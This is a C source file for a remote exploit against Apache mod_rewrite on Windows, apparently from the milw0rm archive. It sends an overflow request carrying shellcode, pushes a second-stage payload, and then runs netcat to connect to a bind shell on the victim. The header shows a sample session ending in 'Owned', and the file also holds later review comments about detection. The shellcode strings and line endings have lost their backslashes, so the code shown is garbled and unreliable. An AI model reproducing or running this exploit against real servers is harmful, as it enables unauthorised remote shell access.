/*
apache mod rewrite exploit (win32)

By: fabio/b0x (oc-192, old CoTS member)

Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded

Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
      original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also
      was a little buggy, so shellcode was rewritten, thanks to http://metasploit.com/

Usage: ./apache hostname rewrite_path

Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard

Example: ./apache 192.168.0.253 test
[+]Preparing payload
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Starting second stage...
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Connecting to shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\Apache Group\Apache2>exit
exit
[+]Owned
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

/* Target ports. PORT is where the first (HTTP) request is sent; PORT2 is
 * where the second stage is sent on a fresh connection. The shell port
 * named in the header (4445) is not defined here — it is hard-coded in
 * the nc command string built in main. */
#define PORT 80 
#define PORT2 4444
/* Size of the receive buffer declared in main. In the visible code that
 * buffer is declared but never read into, so this value is unused. */
#define MAXDATASIZE 1024
/* Request-path fragment placed right after "GET /<rewrite_path>". The
 * "ldap://" scheme followed by URL-encoded '?' separators (%3f) is the
 * distinctive part of the trigger request; access-log and WAF rules for
 * this issue can key on that shape (see the "Vuln details" link above). */
char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
/* First-stage payload, appended to the request after `get` and before
 * `finish`. The header describes it as a bind shell generated with
 * Metasploit; the bytes are not decoded here.
 * NOTE(review): in this copy the "\x" escapes have lost their
 * backslashes (e.g. "xebx03"), so the array holds literal ASCII text,
 * not the bytes the header describes — the listing as shown does not
 * reflect what the author ran. */
char shellcode[]= 
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x48x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax41"
"x58x50x30x42x30x41x6bx41x41x51x41x32x41x41x32x42"
"x42x42x30x42x41x58x38x41x42x50x75x7ax49x4bx58x56"
"x36x73x30x43x30x75x50x70x53x66x35x70x56x31x47x4c"
"x4bx50x6cx44x64x55x48x6cx4bx73x75x75x6cx4cx4bx61"
"x44x73x35x63x48x35x51x4bx5ax6cx4bx50x4ax37x68x6c"
"x4bx42x7ax77x50x37x71x4ax4bx6bx53x44x72x30x49x6e"
"x6bx44x74x6ex6bx56x61x68x6ex54x71x39x6fx6bx4cx70"
"x31x4bx70x6cx6cx67x48x6bx50x54x34x53x37x6bx71x68"
"x4fx44x4dx73x31x78x47x38x6bx38x72x45x6bx73x4cx31"
"x34x46x74x52x55x6bx51x6cx4bx63x6ax65x74x56x61x7a"
"x4bx32x46x4cx4bx76x6cx70x4bx4ex6bx30x5ax75x4cx67"
"x71x5ax4bx6ex6bx74x44x4ex6bx57x71x6bx58x68x6bx76"
"x62x50x31x4bx70x33x6fx53x6ex31x4dx63x6bx4bx72x65"
"x58x55x50x61x4ex31x7ax36x50x42x79x70x64x4ex6bx74"
"x59x6ex6bx43x6bx44x4cx4cx4bx51x4bx77x6cx4cx4bx35"
"x4bx6ex6bx31x4bx74x48x73x63x63x58x6cx4ex70x4ex44"
"x4ex78x6cx79x6fx4bx66x4dx59x6fx37x4bx31x78x6cx33"
"x30x77x71x73x30x47x70x36x37x53x66x51x43x4dx59x69"
"x75x39x78x56x47x57x70x37x70x37x70x6ex70x45x51x33"
"x30x37x70x4cx76x72x39x55x48x7ax47x6dx74x45x49x54"
"x30x4dx39x38x65x77x39x4bx36x50x49x6cx64x35x4ax52"
"x50x4fx37x6cx64x4cx6dx76x4ex4dx39x4bx69x45x59x49"
"x65x4ex4dx78x4bx4ax4dx6bx4cx77x4bx31x47x50x53x74"
"x72x61x4fx46x53x67x42x57x70x61x4bx6cx4dx42x6bx75"
"x70x70x51x6bx4fx7ax77x4bx39x4bx6fx4fx79x4fx33x4e"
"x6dx71x65x52x34x53x5ax53x37x30x59x50x51x66x33x4b"
"x4fx55x64x4cx4fx6bx4fx66x35x43x34x50x59x6ex69x47"
"x74x6cx4ex6ax42x58x72x54x6bx64x67x72x74x39x6fx76"
"x57x6bx4fx50x55x44x70x30x31x4bx70x50x50x30x50x50"
"x50x32x70x77x30x46x30x53x70x70x50x49x6fx63x65x66"
"x4cx4bx39x4fx37x30x31x6bx6bx33x63x71x43x42x48x54"
"x42x63x30x76x71x63x6cx4cx49x6dx30x52x4ax32x30x32"
"x70x36x37x59x6fx52x75x71x34x50x53x70x57x4bx4fx72"
"x75x44x68x61x43x62x74x33x67x59x6fx63x65x67x50x4c"
"x49x38x47x6dx51x5ax4cx53x30x36x70x53x30x33x30x4e"
"x69x4bx53x53x5ax43x30x72x48x53x30x34x50x33x30x33"
"x30x50x53x76x37x6bx4fx36x35x74x58x6ex61x4ax4cx67"
"x70x35x54x33x30x63x30x49x6fx78x53x41";


/* Tail of the request line plus the start of the Host header; main
 * appends argv[1] (the target hostname) right after it. The CRLF appears
 * here as "rn" — the same backslash loss seen in the shellcode strings
 * in this copy, so as written it is not a valid HTTP line ending. */
char finish[]= "HTTP/1.0rnHost: ";

/* Second-stage payload. main sends it on a new connection to PORT2 after
 * the first request and a 3-second sleep; its contents are not decoded
 * here. Same backslash loss as `shellcode` in this copy: the "\x" escapes
 * appear as plain "x.." text, so the array is ASCII, not raw bytes. */
char payload2[]=
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x18"
"xd9x03x3ax83xebxfcxe2xf4xe4xb3xe8x77xf0x20xfcxc5"
"xe7xb9x88x56x3cxfdx88x7fx24x52x7fx3fx60xd8xecxb1"
"x57xc1x88x65x38xd8xe8x73x93xedx88x3bxf6xe8xc3xa3"
"xb4x5dxc3x4ex1fx18xc9x37x19x1bxe8xcex23x8dx27x12"
"x6dx3cx88x65x3cxd8xe8x5cx93xd5x48xb1x47xc5x02xd1"
"x1bxf5x88xb3x74xfdx1fx5bxdbxe8xd8x5ex93x9ax33xb1"
"x58xd5x88x4ax04x74x88x7ax10x87x6bxb4x56xd7xefx6a"
"xe7x0fx65x69x7exb1x30x08x70xaex70x08x47x8dxfcxea"
"x70x12xeexc6x23x89xfcxecx47x50xe6x5cx99x34x0bx38"
"x4dxb3x01xc5xc8xb1xdax33xedx74x54xc5xcex8ax50x69"
"x4bx8ax40x69x5bx8axfcxeax7exb1x12x67x7ex8ax8axdb"
"x8dxb1xa7x20x68x1ex54xc5xcexb3x13x6bx4dx26xd3x52"
"xbcx74x2dxd3x4fx26xd5x69x4dx26xd3x52xfdx90x85x73"
"x4fx26xd5x6ax4cx8dx56xc5xc8x4ax6bxddx61x1fx7ax6d"
"xe7x0fx56xc5xc8xbfx69x5ex7exb1x60x57x91x3cx69x6a"
"x41xf0xcfxb3xffxb3x47xb3xfaxe8xc3xc9xb2x27x41x17"
"xe6x9bx2fxa9x95xa3x3bx91xb3x72x6bx48xe6x6ax15xc5"
"x6dx9dxfcxecx43x8ex51x6bx49x88x69x3bx49x88x56x6b"
"xe7x09x6bx97xc1xdcxcdx69xe7x0fx69xc5xe7xeexfcxea"
"x93x8exffxb9xdcxbdxfcxecx4ax26xd3x52xe8x53x07x65"
"x4bx26xd5xc5xc8xd9x03x3a";

int main(int argc, char *argv[])
{
    int sockfd, numbytes;  
    char buf[MAXDATASIZE];
    struct hostent *he;
    struct sockaddr_in their_addr;
    printf("  Exploit: apache mod rewrite exploit (win32)n"
           "       By: fabio/b0x (oc-192, old CoTS member)n"
           "Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguardn"
           );
    if (argc != 3) {
        printf("    Usage: ./apache hostname rewrite_pathn");
        exit(1);
    }
    printf("n[+]Preparing payloadn");

    char payload[748];
    sprintf(payload,"GET /%s%s%s%s%srnrn�",argv[2],get,shellcode,finish,argv[1]);

    printf("[+]Connecting...n");
    if ((he=gethostbyname(argv[1])) == NULL) {
        printf("[-]Cannot resolv hostname...n");
        exit(1);
    }
    if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-]Socket error...n");
        exit(1);
    }

    their_addr.sin_family = AF_INET;   
    their_addr.sin_port = htons(PORT);  
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(their_addr.sin_zero, '�', sizeof their_addr.sin_zero);
    if (connect(sockfd, (struct sockaddr *)&their_addr,
                                          sizeof(struct sockaddr)) == -1) {
        printf("[-]Unable to connectn");
        exit(1);
    }
   printf("[+]Connectedn[+]Sending...n");
   if (send(sockfd, payload, strlen(payload), 0) == -1){
    printf("[-]Unable to sendn");
    exit(1);
   }
   printf("[+]Sentn");
   close(sockfd);
   printf("[+]Starting second stage...n");
   sleep(3);
    printf("[+]Connecting...n");
    if ((he=gethostbyname(argv[1])) == NULL) { 
        printf("[-]Cannot resolv hostname...n");
        exit(1);
    }
    if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-]Socket error...n");
        exit(1);
    }

    their_addr.sin_family = AF_INET;   
    their_addr.sin_port = htons(PORT2);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(their_addr.sin_zero, '�', sizeof their_addr.sin_zero);
    if (connect(sockfd, (struct sockaddr *)&their_addr,
                                          sizeof(struct sockaddr)) == -1) {
        printf("[-]Unable to connectn");
        exit(1);
    }
   printf("[+]Connectedn[+]Sending...n");
   if (send(sockfd, payload2, strlen(payload2), 0) == -1){
    printf("[-]Unable to sendn");
    exit(1);
   }
   printf("[+]Sentn[+]Connecting to shelln");
   close(sockfd);


   sleep(3);
   int exec;
   char what[1024];
   sprintf(what," nc -w 10 %s 4445",argv[1]);
   exec=system(what);
   if (exec!=0){
    printf("[-]Not hackedn");
   } else {
    printf("[+]Ownedn");
   }
   exit(1);


// milw0rm.com [2007-05-26]